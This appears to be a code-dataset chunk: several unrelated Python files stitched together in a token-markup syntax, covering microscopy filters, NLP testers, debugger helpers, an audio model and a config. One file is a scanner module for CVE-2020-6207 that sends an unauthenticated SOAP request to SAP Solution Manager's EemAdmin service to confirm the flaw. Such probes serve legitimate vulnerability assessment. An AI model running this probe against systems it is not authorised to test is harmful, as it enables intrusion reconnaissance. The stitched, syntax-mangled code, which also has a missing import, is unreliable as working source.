<import_stmt>warnings<import_from_stmt>typing Optional Union<import_from_stmt>starfish.core.morphology.binary_mask BinaryMaskCollection<import_from_stmt>starfish.core.types FunctionSource FunctionSourceBundle<import_from_stmt>._base FilterAlgorithm<class_stmt>Map(FilterAlgorithm)<block_start>"""
Map from input to output by applying a specified function to the input. The output must have
the same shape as the input.
Parameters
----------
func : Union[str, FunctionSourceBundle]
Function to apply across to each of the tiles in the input.
If this value is a string, then the ``module`` parameter is consulted to determine which
python package is used to find the function. If ``module`` is not specified, then the
default is :py:attr:`FunctionSource.np`.
If this value is a ``FunctionSourceBundle``, then the python package and module name is
obtained from the bundle.
module : Optional[FunctionSource]
Python module that serves as the source of the function. It must be listed as one of the
members of :py:class:`FunctionSource`.
Currently, the supported FunctionSources are:
- ``np``: the top-level package of numpy
- ``scipy``: the top-level package of scipy
This is being deprecated in favor of specifying the function as a ``FunctionSourceBundle``.
Examples
--------
Applying a binary opening function.
>>> from starfish.core.morphology.binary_mask.test import factories
>>> from starfish.morphology import Filter
>>> from starfish.types import FunctionSource
>>> from skimage.morphology import disk
>>> binary_mask_collection = factories.binary_mask_collection_2d()
>>> opener = Filter.Map(FunctionSource.scipy("morphology.binary_opening"), disk(4))
>>> opened = opener.run(binary_mask_collection)
"""<def_stmt>__init__ self func:Union[str FunctionSourceBundle] *func_args module:FunctionSource=FunctionSource.np **func_kwargs <arrow><none><block_start><if_stmt>isinstance(func str)<block_start><if_stmt>module<is><not><none><block_start>warnings.warn(f"The module parameter is being deprecated. Use "<concat>f"`func=FunctionSource.{module.name}{func} instead." DeprecationWarning)<block_end><else_stmt><block_start>module=FunctionSource.np<block_end>self._func=module(func)<block_end><elif_stmt>isinstance(func FunctionSourceBundle)<block_start><if_stmt>module<is><not><none><block_start><raise>ValueError("When passing in the function as a `FunctionSourceBundle`, module should not "<concat>"be set.")<block_end>self._func=func<block_end>self._func_args=func_args<line_sep>self._func_kwargs=func_kwargs<block_end><def_stmt>run self binary_mask_collection:BinaryMaskCollection n_processes:Optional[int]=<none> *args **kwargs<arrow>BinaryMaskCollection<block_start>"""Map from input to output by applying a specified function to the input.
Parameters
----------
binary_mask_collection : BinaryMaskCollection
BinaryMaskCollection to be filtered.
n_processes : Optional[int]
The number of processes to use for apply. If None, uses the output of os.cpu_count()
(default = None).
Returns
-------
BinaryMaskCollection
Return the results of filter as a new BinaryMaskCollection.
"""<line_sep># Apply the reducing function
<return>binary_mask_collection._apply(self._func.resolve() *self._func_args **self._func_kwargs)<block_end><block_end> |
<import_stmt>requests<line_sep># Vuln Base Info
<def_stmt>info <block_start><return>{"author":"cckuailong" "name":'''SAP Solution Manager remote unauthorized OS commands execution''' "description":'''SAP Solution Manager (SolMan) running version 7.2 has CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem). The vulnerability occurs due to missing authentication checks when submitting SOAP requests to the /EemAdminService/EemAdmin page to get information about connected SMDAgents, send HTTP request (SSRF), and execute OS commands on connected SMDAgent.''' "severity":"critical" "references":["https://launchpad.support.sap.com/#/notes/2890213" "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=540935305" "https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf" "https://github.com/chipik/SAP_EEM_CVE-2020-6207" "https://www.rapid7.com/db/modules/auxiliary/admin/sap/cve_2020_6207_solman_rce/" "https://www.rapid7.com/db/modules/exploit/multi/sap/cve_2020_6207_solman_rs/"] "classification":{"cvss-metrics":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" "cvss-score":"" "cve-id":"CVE-2020-6207" "cwe-id":"CWE-306"} "metadata":{"vuln-target":"" } "tags":["cve" "cve2020" "sap" "solman" "rce"] }<block_end># Vender Fingerprint
<def_stmt>fingerprint url<block_start><return><true><block_end># Proof of Concept
<def_stmt>poc url<block_start>result={}<try_stmt><block_start>url=format_url(url)<line_sep>path="""/EemAdminService/EemAdmin"""<line_sep>method="POST"<line_sep>data="""<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:adm="http://sap.com/smd/eem/admin/"><soapenv:Header/><soapenv:Body><adm:getAllAgentInfo/></soapenv:Body></soapenv:Envelope>"""<line_sep>headers={'SOAPAction':'""' 'Content-Type':'text/xml; charset=UTF-8' 'Connection':'close'}<line_sep>resp0=requests.request(method=method url=url+path data=data headers=headers timeout=10 verify=<false> allow_redirects=<false>)<if_stmt>(""":Envelope"""<in>resp0.text<and>""":Body"""<in>resp0.text<and>""":getAllAgentInfoResponse"""<in>resp0.text)<and>(resp0.status_code<eq>200)<and>("""text/xml"""<in>str(resp0.headers)<and>"""SAP NetWeaver Application Server"""<in>str(resp0.headers))<block_start>result["success"]=<true><line_sep>result["info"]=info()<line_sep>result["payload"]=url+path<block_end><block_end><except_stmt><block_start>result["success"]=<false><block_end><return>result<block_end># Exploit, can be same with poc()
<def_stmt>exp url<block_start><return>poc(url)<block_end># Utils
<def_stmt>format_url url<block_start>url=url.strip()<if_stmt><not>(url.startswith('http://')<or>url.startswith('https://'))<block_start>url='http://'+url<block_end>url=url.rstrip('/')<line_sep><return>url<block_end> |
<import_from_stmt>allennlp.common.testing ModelTestCase<import_from_stmt>qa.squad.rnet RNet<class_stmt>RNetDynamicTest(ModelTestCase)<block_start><def_stmt>setUp self<block_start>super().setUp()<line_sep>self.set_up_model('tests/fixtures/rnet/experiment_dynamic.jsonnet' 'tests/fixtures/data/squad.json')<block_end><def_stmt>test_model_can_train_save_and_load self<block_start>self.ensure_model_can_train_save_and_load(self.param_file)<block_end><block_end> |
# coding: utf-8
<import_from_stmt>typing List Tuple Dict<import_stmt>torch<import_stmt>logging<import_stmt>sys<import_stmt>os<import_stmt>copy<import_stmt>json<import_stmt>collections<import_stmt>subprocess<import_from_stmt>tqdm tqdm trange<import_from_stmt>torch.utils.data TensorDataset DataLoader RandomSampler SequentialSampler<import_from_stmt>torch.utils.data.distributed DistributedSampler<line_sep># My Staff
<import_from_stmt>utils.iter_helper PadCollate FewShotDataset<import_from_stmt>utils.preprocessor FewShotFeature ModelInput<import_from_stmt>utils.device_helper prepare_model<import_from_stmt>utils.model_helper make_model load_model<import_from_stmt>models.modules.transition_scorer FewShotTransitionScorer<import_from_stmt>models.few_shot_seq_labeler FewShotSeqLabeler<line_sep>logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s' datefmt='%m/%d/%Y %H:%M:%S' level=logging.INFO stream=sys.stdout)<line_sep>logger=logging.getLogger(__name__)<line_sep>RawResult=collections.namedtuple("RawResult" ["feature" "prediction"])<class_stmt>TesterBase<block_start>"""
Support features:
- multi-gpu [accelerating]
- distributed gpu [accelerating]
- padding when forward [better result & save space]
"""<def_stmt>__init__ self opt device n_gpu<block_start><if_stmt>opt.gradient_accumulation_steps<l>1<block_start><raise>ValueError("Invalid gradient_accumulation_steps parameter: {}, should be >= 1".format(opt.gradient_accumulation_steps))<block_end>self.opt=opt<line_sep># Following is used to split the batch to save space
self.batch_size=opt.test_batch_size<line_sep>self.device=device<line_sep>self.n_gpu=n_gpu<block_end><def_stmt>do_test self model:torch.nn.Module test_features:List[FewShotFeature] id2label:dict log_mark:str='test_pred'<block_start>logger.info("***** Running eval *****")<line_sep># print("***** Running eval *****")
logger.info(" Num features = %d" len(test_features))<line_sep>logger.info(" Batch size = %d" self.batch_size)<line_sep>all_results=[]<line_sep>model.eval()<line_sep>data_loader=self.get_data_loader(test_features)<for_stmt>batch tqdm(data_loader desc="Eval-Batch Progress")<block_start>batch=tuple(t.to(self.device)<for>t batch)# multi-gpu does scattering it-self
<with_stmt>torch.no_grad()<block_start>predictions=self.do_forward(batch model)<block_end><for_stmt>i,feature_gid enumerate(batch[0])# iter over feature global id
<block_start>prediction=predictions[i]<line_sep>feature=test_features[feature_gid.item()]<line_sep>all_results.append(RawResult(feature=feature prediction=prediction))<if_stmt>model.emb_log<block_start>model.emb_log.write('text_'+str(feature_gid.item())+'\t'+'\t'.join(feature.test_feature_item.data_item.seq_in)+'\n')<block_end><block_end><block_end># close file handler
<if_stmt>model.emb_log<block_start>model.emb_log.close()<block_end>scores=self.eval_predictions(all_results id2label log_mark)<line_sep><return>scores<block_end><def_stmt>get_data_loader self features<block_start>dataset=TensorDataset([self.unpack_feature(f)<for>f features])<if_stmt>self.opt.local_rank<eq>-1<block_start>sampler=RandomSampler(dataset)<block_end><else_stmt><block_start>sampler=DistributedSampler(dataset)<block_end>data_loader=DataLoader(dataset sampler=sampler batch_size=self.batch_size)<line_sep><return>data_loader<block_end><def_stmt>clone_model self model id2label# get a new instance
<block_start><return>copy.deepcopy(model)<block_end><def_stmt>unpack_feature self feature<arrow>List[torch.Tensor]<block_start><raise>NotImplementedError<block_end><def_stmt>do_forward self batch model<block_start>prediction=model(*batch)<line_sep><return>prediction<block_end><def_stmt>eval_predictions self *args **kwargs<arrow>float<block_start><raise>NotImplementedError<block_end><block_end><class_stmt>FewShotTester(TesterBase)<block_start>"""
Support features:
- multi-gpu [accelerating]
- distributed gpu [accelerating]
- padding when forward [better result & save space]
"""<def_stmt>__init__ self opt device n_gpu<block_start>super(FewShotTester self).__init__(opt device n_gpu)<block_end><def_stmt>get_data_loader self features<block_start>dataset=FewShotDataset([self.unpack_feature(f)<for>f features])<if_stmt>self.opt.local_rank<eq>-1<block_start>sampler=SequentialSampler(dataset)<block_end><else_stmt><block_start>sampler=DistributedSampler(dataset)<block_end>pad_collate=PadCollate(dim=-1 sp_dim=-2 sp_item_idx=[3 8 12])# nwp_index, spt_tgt need special padding
data_loader=DataLoader(dataset sampler=sampler batch_size=self.batch_size collate_fn=pad_collate)<line_sep><return>data_loader<block_end><def_stmt>eval_predictions self all_results:List[RawResult] id2label:dict log_mark:str<arrow>float<block_start>""" Our result score is average score of all few-shot batches. """<line_sep>all_batches=self.reform_few_shot_batch(all_results)<line_sep>all_scores=[]<for_stmt>b_id,fs_batch all_batches<block_start>f1=self.eval_one_few_shot_batch(b_id fs_batch id2label log_mark)<line_sep>all_scores.append(f1)<block_end><return>sum(all_scores)<times>1.0/len(all_scores)<block_end><def_stmt>eval_one_few_shot_batch self b_id fs_batch:List[RawResult] id2label:dict log_mark:str<arrow>float<block_start>pred_file_name='{}.{}.txt'.format(log_mark b_id)<line_sep>output_prediction_file=os.path.join(self.opt.output_dir pred_file_name)<if_stmt>self.opt.task<eq>'sl'<block_start>self.writing_sl_prediction(fs_batch output_prediction_file id2label)<line_sep>precision,recall,f1=self.eval_with_script(output_prediction_file)<block_end><elif_stmt>self.opt.task<eq>'sc'<block_start>precision,recall,f1=self.writing_sc_prediction(fs_batch output_prediction_file id2label)<block_end><else_stmt><block_start><raise>ValueError("Wrong task.")<block_end><return>f1<block_end><def_stmt>writing_sc_prediction self fs_batch:List[RawResult] output_prediction_file:str id2label:dict<block_start>tp,fp,fn=0 0 0<line_sep>writing_content=[]<for_stmt>result fs_batch<block_start>pred_ids=result.prediction# prediction is directly the predict ids [pad is removed in decoder]
feature=result.feature<line_sep>pred_label=set([id2label[pred_id]<for>pred_id pred_ids])<line_sep>label=set(feature.test_feature_item.data_item.label)<line_sep>writing_content.append({'seq_in':feature.test_feature_item.data_item.seq_in 'pred':list(pred_label) 'label':list(label) })<line_sep>tp,fp,fn=self.update_f1_frag(pred_label label tp fp fn)<block_end># update tp, fp, fn
<with_stmt>open(output_prediction_file "w")<as>writer<block_start>json.dump(writing_content writer indent=2)<block_end><return>self.compute_f1(tp fp fn)<block_end><def_stmt>update_f1_frag self pred_label label tp=0 fp=0 fn=0<block_start>tp<augadd>len(pred_label&label)<line_sep>fp<augadd>len(pred_label-label)<line_sep>fn<augadd>len(label-pred_label)<line_sep><return>tp fp fn<block_end><def_stmt>compute_f1 self tp fp fn<block_start>tp<augadd>0.0000001# to avoid zero division
fp<augadd>0.0000001<line_sep>fn<augadd>0.0000001<line_sep>precision=1.0<times>tp/(tp+fp)<line_sep>recall=1.0<times>tp/(tp+fn)<line_sep>f1=2<times>precision<times>recall/(precision+recall)<line_sep><return>precision recall f1<block_end><def_stmt>writing_sl_prediction self fs_batch:List[RawResult] output_prediction_file:str id2label:dict<block_start>writing_content=[]<for_stmt>result fs_batch<block_start>prediction=result.prediction<line_sep>feature=result.feature<line_sep>pred_ids=prediction# prediction is directly the predict ids
<if_stmt>len(pred_ids)<ne>len(feature.test_feature_item.data_item.seq_in)<block_start><raise>RuntimeError("Failed to align the pred_ids to texts: {},{} \n{},{} \n{},{}".format(len(pred_ids) pred_ids len(feature.test_feature_item.data_item.seq_in) feature.test_feature_item.data_item.seq_in len(feature.test_feature_item.data_item.seq_out) feature.test_feature_item.data_item.seq_out))<block_end><for_stmt>pred_id,word,true_label zip(pred_ids feature.test_feature_item.data_item.seq_in feature.test_feature_item.data_item.seq_out)<block_start>pred_label=id2label[pred_id]<line_sep>writing_content.append('{0} {1} {2}'.format(word true_label pred_label))<block_end>writing_content.append('')<block_end><with_stmt>open(output_prediction_file "w")<as>writer<block_start>writer.write('\n'.join(writing_content))<block_end><block_end><def_stmt>eval_with_script self output_prediction_file<block_start>script_args=['perl' self.opt.eval_script]<with_stmt>open(output_prediction_file 'r')<as>res_file<block_start>p=subprocess.Popen(script_args stdout=subprocess.PIPE stdin=res_file)<line_sep>p.wait()<line_sep>std_results=p.stdout.readlines()<if_stmt>self.opt.verbose<block_start><for_stmt>r std_results<block_start>print(r)<block_end><block_end>std_results=str(std_results[1]).split()<block_end>precision=float(std_results[3].replace('%;' ''))<line_sep>recall=float(std_results[5].replace('%;' ''))<line_sep>f1=float(std_results[7].replace('%;' '').replace("\\n'" ''))<line_sep><return>precision recall f1<block_end><def_stmt>reform_few_shot_batch self all_results:List[RawResult]<arrow>List[List[Tuple[int RawResult]]]<block_start>"""
Our result score is average score of all few-shot batches.
So here, we classify all result according to few-shot batch id.
"""<line_sep>all_batches={}<for_stmt>result all_results<block_start>b_id=result.feature.batch_gid<if_stmt>b_id<not><in>all_batches<block_start>all_batches[b_id]=[result]<block_end><else_stmt><block_start>all_batches[b_id].append(result)<block_end><block_end><return>sorted(all_batches.items() key=<lambda>x:x[0])<block_end><def_stmt>unpack_feature self feature:FewShotFeature<arrow>List[torch.Tensor]<block_start>ret=[torch.LongTensor([feature.gid]) # test
feature.test_input.token_ids feature.test_input.segment_ids feature.test_input.nwp_index feature.test_input.input_mask feature.test_input.output_mask # support
feature.support_input.token_ids feature.support_input.segment_ids feature.support_input.nwp_index feature.support_input.input_mask feature.support_input.output_mask # target
feature.test_target feature.support_target # Special
torch.LongTensor([len(feature.support_feature_items)]) # support num
]<line_sep><return>ret<block_end><def_stmt>do_forward self batch model<block_start>(gid # 0
test_token_ids # 1
test_segment_ids # 2
test_nwp_index # 3
test_input_mask # 4
test_output_mask # 5
support_token_ids # 6
support_segment_ids # 7
support_nwp_index # 8
support_input_mask # 9
support_output_mask # 10
test_target # 11
support_target # 12
support_num # 13
)=batch<line_sep>prediction=model(# loss, prediction = model(
test_token_ids test_segment_ids test_nwp_index test_input_mask test_output_mask support_token_ids support_segment_ids support_nwp_index support_input_mask support_output_mask test_target support_target support_num )<line_sep><return>prediction<block_end><def_stmt>get_value_from_order_dict self order_dict key<block_start>""""""<for_stmt>k,v order_dict.items()<block_start><if_stmt>key<in>k<block_start><return>v<block_end><block_end><return>[]<block_end><def_stmt>clone_model self model id2label<block_start>""" clone only part of params """<line_sep># deal with data parallel model
new_model:FewShotSeqLabeler<line_sep>old_model:FewShotSeqLabeler<if_stmt>self.opt.local_rank<ne>-1<or>self.n_gpu<g>1<and>hasattr(model 'module')# the model is parallel class here
<block_start>old_model=model.module<block_end><else_stmt><block_start>old_model=model<block_end>emission_dict=old_model.emission_scorer.state_dict()<line_sep>old_num_tags=len(self.get_value_from_order_dict(emission_dict 'label_reps'))<line_sep>config={'num_tags':len(id2label) 'id2label':id2label}<if_stmt>'num_anchors'<in>old_model.config<block_start>config['num_anchors']=old_model.config['num_anchors']# Use previous model's random anchors.
<block_end># get a new instance for different domain
new_model=make_model(opt=self.opt config=config)<line_sep>new_model=prepare_model(self.opt new_model self.device self.n_gpu)<if_stmt>self.opt.local_rank<ne>-1<or>self.n_gpu<g>1<block_start>sub_new_model=new_model.module<block_end><else_stmt><block_start>sub_new_model=new_model<block_end>''' copy weights and stuff '''<if_stmt>old_model.opt.task<eq>'sl'<and>old_model.transition_scorer# copy one-by-one because target transition and decoder will be left un-assigned
<block_start>sub_new_model.context_embedder.load_state_dict(old_model.context_embedder.state_dict())<line_sep>sub_new_model.emission_scorer.load_state_dict(old_model.emission_scorer.state_dict())<for_stmt>param_name ['backoff_trans_mat' 'backoff_start_trans_mat' 'backoff_end_trans_mat']<block_start>sub_new_model.transition_scorer.state_dict()[param_name].copy_(old_model.transition_scorer.state_dict()[param_name].data)<block_end><block_end><else_stmt><block_start>sub_new_model.load_state_dict(old_model.state_dict())<block_end><return>new_model<block_end><block_end><class_stmt>SchemaFewShotTester(FewShotTester)<block_start><def_stmt>__init__ self opt device n_gpu<block_start>super(SchemaFewShotTester self).__init__(opt device n_gpu)<block_end><def_stmt>get_data_loader self features<block_start>""" add label index into special padding """<line_sep>dataset=FewShotDataset([self.unpack_feature(f)<for>f features])<if_stmt>self.opt.local_rank<eq>-1<block_start>sampler=SequentialSampler(dataset)<block_end><else_stmt><block_start>sampler=DistributedSampler(dataset)<block_end>pad_collate=PadCollate(dim=-1 sp_dim=-2 sp_item_idx=[3 8 12 16])# nwp_index, spt_tgt need sp-padding
data_loader=DataLoader(dataset sampler=sampler batch_size=self.batch_size collate_fn=pad_collate)<line_sep><return>data_loader<block_end><def_stmt>unpack_feature self feature:FewShotFeature<arrow>List[torch.Tensor]<block_start>ret=[torch.LongTensor([feature.gid]) # test
feature.test_input.token_ids feature.test_input.segment_ids feature.test_input.nwp_index feature.test_input.input_mask feature.test_input.output_mask # support
feature.support_input.token_ids feature.support_input.segment_ids feature.support_input.nwp_index feature.support_input.input_mask feature.support_input.output_mask # target
feature.test_target feature.support_target # Special
torch.LongTensor([len(feature.support_feature_items)]) # support num
# label feature
feature.label_input.token_ids feature.label_input.segment_ids feature.label_input.nwp_index feature.label_input.input_mask feature.label_input.output_mask ]<line_sep><return>ret<block_end><def_stmt>do_forward self batch model<block_start>(gid # 0
test_token_ids # 1
test_segment_ids # 2
test_nwp_index # 3
test_input_mask # 4
test_output_mask # 5
support_token_ids # 6
support_segment_ids # 7
support_nwp_index # 8
support_input_mask # 9
support_output_mask # 10
test_target # 11
support_target # 12
support_num # 13
# label feature
label_token_ids # 14
label_segment_ids # 15
label_nwp_index # 16
label_input_mask # 17
label_output_mask # 18
)=batch<line_sep>prediction=model(test_token_ids test_segment_ids test_nwp_index test_input_mask test_output_mask support_token_ids support_segment_ids support_nwp_index support_input_mask support_output_mask test_target support_target support_num # label feature
label_token_ids label_segment_ids label_nwp_index label_input_mask label_output_mask )<line_sep><return>prediction<block_end><block_end><def_stmt>eval_check_points opt tester test_features test_id2label device<block_start>all_cpt_file=list(filter(<lambda>x:'.cpt.pl'<in>x os.listdir(opt.saved_model_path)))<line_sep>all_cpt_file=sorted(all_cpt_file key=<lambda>x:int(x.replace('model.step' '').replace('.cpt.pl' '')))<line_sep>max_score=0<for_stmt>cpt_file all_cpt_file<block_start>cpt_model=load_model(os.path.join(opt.saved_model_path cpt_file))<line_sep>testing_model=tester.clone_model(cpt_model test_id2label)<if_stmt>opt.mask_transition<and>opt.task<eq>'sl'<block_start>testing_model.label_mask=opt.test_label_mask.to(device)<block_end>test_score=tester.do_test(testing_model test_features test_id2label log_mark='test_pred')<if_stmt>test_score<g>max_score<block_start>max_score=test_score<block_end>logger.info('cpt_file:{} - test:{}'.format(cpt_file test_score))<block_end><return>max_score<block_end> |
<import_from_stmt>enum Enum<import_from_stmt>stories story<line_sep># Base classes.
<class_stmt>ChildWithNull<block_start>@story<def_stmt>x I<block_start>I.one<block_end><block_end><class_stmt>NextChildWithNull<block_start>@story<def_stmt>y I<block_start>I.two<block_end><block_end><class_stmt>ParentWithNull<block_start>@story<def_stmt>a I<block_start>I.before<line_sep>I.x<line_sep>I.after<block_end><block_end><class_stmt>SequenceParentWithNull<block_start>@story<def_stmt>a I<block_start>I.before<line_sep>I.x<line_sep>I.y<line_sep>I.after<block_end><block_end><class_stmt>ChildWithList<block_start>@story<def_stmt>x I<block_start>I.one<block_end><block_end>ChildWithList.x.failures(["foo" "bar" "baz"])<class_stmt>NextChildWithList<block_start>@story<def_stmt>y I<block_start>I.two<block_end><block_end>NextChildWithList.y.failures(["spam" "ham" "eggs"])<class_stmt>ParentWithList<block_start>@story<def_stmt>a I<block_start>I.before<line_sep>I.x<line_sep>I.after<block_end><block_end>ParentWithList.a.failures(["foo" "bar" "baz"])<class_stmt>WideParentWithList<block_start>@story<def_stmt>a I<block_start>I.before<line_sep>I.x<line_sep>I.after<block_end><block_end>WideParentWithList.a.failures(["foo" "bar" "baz" "quiz"])<class_stmt>ShrinkParentWithList<block_start>@story<def_stmt>a I<block_start>I.before<line_sep>I.x<line_sep>I.after<block_end><block_end>ShrinkParentWithList.a.failures(["foo" "quiz"])<class_stmt>ChildWithEnum<block_start>@story<def_stmt>x I<block_start>I.one<block_end>@x.failures<class_stmt>Errors(Enum)<block_start>foo=1<line_sep>bar=2<line_sep>baz=3<block_end><block_end><class_stmt>NextChildWithEnum<block_start>@story<def_stmt>y I<block_start>I.two<block_end>@y.failures<class_stmt>Errors(Enum)<block_start>spam=1<line_sep>ham=2<line_sep>eggs=3<block_end><block_end><class_stmt>ParentWithEnum<block_start>@story<def_stmt>a 
I<block_start>I.before<line_sep>I.x<line_sep>I.after<block_end><block_end>@ParentWithEnum.a.failures<class_stmt>Errors(Enum)<block_start>foo=1<line_sep>bar=2<line_sep>baz=3<block_end><class_stmt>WideParentWithEnum<block_start>@story<def_stmt>a I<block_start>I.before<line_sep>I.x<line_sep>I.after<block_end><block_end>@WideParentWithEnum.a.failures<class_stmt>Errors(Enum)# noqa: F811
<block_start>foo=1<line_sep>bar=2<line_sep>baz=3<line_sep>quiz=4<block_end><class_stmt>ShrinkParentWithEnum<block_start>@story<def_stmt>a I<block_start>I.before<line_sep>I.x<line_sep>I.after<block_end><block_end>@ShrinkParentWithEnum.a.failures<class_stmt>Errors(Enum)# noqa: F811
<block_start>foo=1<line_sep>quiz=4<block_end> |
# Check http://doc.qt.io/qtcreator/creator-debugging-helpers.html
# for more details or look at qttypes.py, stdtypes.py, boosttypes.py
# for more complex examples.
<import_from_stmt>dumper Children SubItem UnnamedSubItem DumperBase<import_from_stmt>utils DisplayFormat TypeCode<import_from_stmt>qttypes *<import_stmt>struct<line_sep>####################### Your code below #######################
### Part 1
<def_stmt>qdump__Foo d value<block_start>i=value["i"].integer()<line_sep>j=value["j"].integer()<line_sep>d.putValue("[%d,%d]"%(i j))<line_sep>d.putExpandable()<if_stmt>d.isExpanded()<block_start><with_stmt>Children(d)<block_start>d.putSubItem('j' value["j"])<line_sep># Don't try this at home :-)
# and the "i" (that is the one in quotes stand for type integer...
d.putSubItem('i' d.createValue(struct.pack("i" i) d.intType()))<with_stmt>SubItem(d "sum")<block_start>d.putValue(i+j)<line_sep>d.putType(d.intType())<block_end><block_end><block_end><block_end># not really needed though
### Part 2
<def_stmt>qdump__MyNameSpace__Foo d value<block_start>d.putValue("Secret!")<line_sep>d.putPlainChildren(value)<block_end>### Part 3
#def qdump__Money(d, value):
# amount = value["m_amount"].floatingPoint()
# currency = value["m_currency"].integer()
# d.putValue("%s %s" % (("EUR" if (currency == 0) else "USD"), amount))
# d.putPlainChildren(value)
### Part 4
<def_stmt>qdump__Money d value<block_start>str=d.call("@QString" value "toString")<line_sep>d.putStringValue(str)<line_sep>d.putPlainChildren(value)<block_end>### Part 5
<def_stmt>qdump__FooOrBar d value<block_start>str=d.parseAndEvaluate("fooOrBarToString(*((FooOrBar*)%s))"%value.laddress)<line_sep>d.putStringValue(str)<line_sep>d.putPlainChildren(value)<block_end>#### Part 6
<def_stmt>qdump__UserID d value<block_start>employeeID=value.integer()<line_sep>str=d.parseAndEvaluate("EmployeeDatabase::instance().lookup(%d)"%employeeID)<line_sep>d.putStringValue(str)<block_end><def_stmt>qdump__UserIDList d value<block_start>d.createTypedefedType(d.lookupType("int") "UserID")<line_sep>d.formats[d.currentIName]=DisplayFormat.DirectQListStorage<line_sep>d.putItem(value.cast("QList<UserID>"))<block_end> |
<import_stmt>tensorflow<as>tf<import_from_stmt>tensorflow.keras.layers BatchNormalization LeakyReLU Activation Conv1D ELU Add <import_from_stmt>functools partial<import_from_stmt>tensorflow.compat.v1.keras.initializers he_uniform<def_stmt>_get_conv_activation_layer params<block_start>"""
:param params:
:returns: Required Activation function.
"""<line_sep>conv_activation=params.get('conv_activation')<if_stmt>conv_activation<eq>'ReLU'<block_start><return>ReLU()<block_end><elif_stmt>conv_activation<eq>'ELU'<block_start><return>ELU()<block_end><return>LeakyReLU(0.2)<block_end><class_stmt>UpSamplingLayer<block_start><def_stmt>__init__ self channel_out kernel_size=5 stride=1<block_start>self.seq=tf.keras.Sequential()<line_sep>self.seq.add(tf.keras.layers.Conv1D(channel_out kernel_size=kernel_size strides=stride padding='SAME' dilation_rate=1 ))<line_sep>self.seq.add(BatchNormalization(axis=-1))<line_sep>self.seq.add(LeakyReLU(0.2))<block_end><def_stmt>__call__ self x training=<true><block_start><return>self.seq(x training=training)<block_end><block_end><class_stmt>Model<block_start><def_stmt>__init__ self inputs training=<true> ksize=5 n_layers=12 channels_interval=24 logging=<true> <block_start>conv_activation_layer=_get_conv_activation_layer({})<line_sep>kernel_initializer=he_uniform(seed=50)<line_sep>conv1d_factory=partial(Conv1D strides=(2) padding='same' kernel_initializer=kernel_initializer )<def_stmt>resnet_block input_tensor filter_size<block_start>res=conv1d_factory(filter_size (1) strides=(1) use_bias=<false>)(input_tensor)<line_sep>conv1=conv1d_factory(filter_size (5) strides=(1))(input_tensor)<line_sep>batch1=BatchNormalization(axis=-1)(conv1 training=training)<line_sep>rel1=conv_activation_layer(batch1)<line_sep>conv2=conv1d_factory(filter_size (5) strides=(1))(rel1)<line_sep>batch2=BatchNormalization(axis=-1)(conv2 training=training)<line_sep>resconnection=Add()([res batch2])<line_sep>rel2=conv_activation_layer(resconnection)<line_sep><return>rel2<block_end>self.n_layers=n_layers<line_sep>self.channels_interval=channels_interval<line_sep>out_channels=[i<times>self.channels_interval<for>i range(1 self.n_layers+1)]<line_sep>self.middle=tf.keras.Sequential()<line_sep>self.middle.add(tf.keras.layers.Conv1D(self.n_layers<times>self.channels_interval kernel_size=15 strides=1 padding='SAME' 
dilation_rate=1 ))<line_sep>self.middle.add(BatchNormalization(axis=-1))<line_sep>self.middle.add(LeakyReLU(0.2))<line_sep>decoder_out_channels_list=out_channels[::-1]<line_sep>self.decoder=[]<for_stmt>i range(self.n_layers)<block_start>self.decoder.append(UpSamplingLayer(channel_out=decoder_out_channels_list[i]))<block_end>self.out=tf.keras.Sequential()<line_sep>self.out.add(tf.keras.layers.Conv1D(1 kernel_size=1 strides=1 padding='SAME' dilation_rate=1 ))<line_sep>self.out.add(Activation('tanh'))<line_sep>tmp=[]<line_sep>o=inputs<for_stmt>i range(self.n_layers)<block_start>o=resnet_block(o out_channels[i])<line_sep>tmp.append(o)<line_sep>o=o[: ::2]<if_stmt>logging<block_start>print(o)<block_end><block_end>o=self.middle(o training=training)<if_stmt>logging<block_start>print(o)<block_end><for_stmt>i range(self.n_layers)<block_start>o=tf.image.resize(o [tf.shape(o)[0] tf.shape(o)[1]<times>2] method='nearest')<line_sep>o=tf.concat([o tmp[self.n_layers-i-1]] axis=2)<line_sep>o=self.decoder[i](o training=training)<if_stmt>logging<block_start>print(o)<block_end><block_end><if_stmt>logging<block_start>print(o inputs)<block_end>o=tf.concat([o inputs] axis=2)<line_sep>o=self.out(o training=training)<line_sep>self.logits=o<block_end><block_end> |
<import_stmt>torch<import_stmt>numpy<as>np<import_stmt>os<import_from_stmt>voicefixer.tools.path root_path<class_stmt>Config<block_start>@classmethod<def_stmt>refresh cls sr<block_start><if_stmt>sr<eq>44100<block_start>Config.ckpt=os.path.join(os.path.expanduser("~") ".cache/voicefixer/synthesis_module/44100/model.ckpt-1490000_trimed.pt" )<line_sep>Config.cond_channels=512<line_sep>Config.m_channels=768<line_sep>Config.resstack_depth=[8 8 8 8]<line_sep>Config.channels=1024<line_sep>Config.cin_channels=128<line_sep>Config.upsample_scales=[7 7 3 3]<line_sep>Config.num_mels=128<line_sep>Config.n_fft=2048<line_sep>Config.hop_length=441<line_sep>Config.sample_rate=44100<line_sep>Config.fmax=22000<line_sep>Config.mel_win=128<line_sep>Config.local_condition_dim=128<block_end><else_stmt><block_start><raise>RuntimeError("Error: Vocoder currently only support 44100 samplerate.")<block_end><block_end>ckpt=os.path.join(os.path.expanduser("~") ".cache/voicefixer/synthesis_module/44100/model.ckpt-1490000_trimed.pt" )<line_sep>m_channels=384<line_sep>bits=10<line_sep>opt="Ralamb"<line_sep>cond_channels=256<line_sep>clip=0.5<line_sep>num_bands=1<line_sep>cin_channels=128<line_sep>upsample_scales=[7 7 3 3]<line_sep>filterbands="test/filterbanks_4bands.dat"<line_sep>##For inference
